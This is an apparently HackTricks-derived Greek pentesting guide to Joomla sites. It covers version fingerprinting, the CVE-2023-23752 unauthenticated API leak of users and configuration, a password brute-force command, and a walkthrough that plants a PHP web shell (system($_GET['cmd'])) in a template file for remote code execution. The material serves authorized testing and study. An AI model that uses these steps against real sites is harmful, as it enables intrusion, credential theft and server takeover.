Joomla

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Red Team AWS του HackTricks)!

Στατιστικά Joomla

Το Joomla συλλέγει μερικά ανώνυμα στατιστικά χρήσης όπως η ανάλυση των εκδόσεων Joomla, PHP και βάσεων δεδομένων και των λειτουργικών συστημάτων διακομιστών που χρησιμοποιούνται σε εγκαταστάσεις Joomla. Αυτά τα δεδομένα μπορούν να αναζητηθούν μέσω του δημόσιου API τους.

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Απαρίθμηση

Ανακάλυψη/Αποτύπωση

  • Ελέγξτε τα μετα

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
  • robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
  • README.txt

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Έκδοση

  • Στο /administrator/manifests/files/joomla.xml μπορείτε να δείτε την έκδοση.

  • Στο /language/en-GB/en-GB.xml μπορείτε να βρείτε την έκδοση του Joomla.

  • Στο plugins/system/cache/cache.xml μπορείτε να δείτε μια περίπου έκδοση.

droopescan scan joomla --url http://joomla-site.local/

API Αποκάλυψη Πληροφοριών χωρίς Πιστοποίηση:

Οι εκδόσεις από 4.0.0 έως 4.2.7 είναι ευάλωτες στην Αποκάλυψη πληροφοριών χωρίς πιστοποίηση (CVE-2023-23752) που θα απορροφήσει διαπιστευτήρια και άλλες πληροφορίες.

  • Χρήστες: http://<host>/api/v1/users?public=true

  • Αρχείο ρυθμίσεων: http://<host>/api/index.php/v1/config/application?public=true

Ενότητα MSF: scanner/http/joomla_api_improper_access_checks ή ruby script: 51334

Επίθεση Με Δοκιμή Κωδικών

Μπορείτε να χρησιμοποιήσετε αυτό το σενάριο για να προσπαθήσετε να εκτελέσετε επίθεση με δοκιμή κωδικϋ.

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

Αν καταφέρετε να αποκτήσετε διαπιστευτήρια διαχειριστή, μπορείτε να εκτελέσετε κώδικα RCE προσθέτοντας ένα τμήμα PHP κώδικα για να κερδίσετε RCE. Μπορούμε να το κάνουμε αυτό προσαρμόζοντας ένα πρότυπο.

  1. Κάντε κλικ στα Πρότυπα στο κάτω μέρος κάτω από Διαμόρφωση για να εμφανιστεί το μενού προτύπων.

  2. Κάντε κλικ σε ένα όνομα προτύπου. Ας επιλέξουμε protostar κάτω από την κεφαλίδα στήλη Πρότυπο. Αυτό θα μας οδηγήσει στη σελίδα Πρότυπα: Προσαρμογή.

  3. Τέλος, μπορείτε να κάνετε κλικ σε μια σελίδα για να εμφανιστεί ο πηγαίος κώδικας. Ας επιλέξουμε τη σελίδα error.php. Θα προσθέσουμε ένα PHP μονογραμμικό για εκτέλεση κώδικα ως εξής:

  4. system($_GET['cmd']);

  5. Αποθηκεύστε & Κλείστε

  6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

Last updated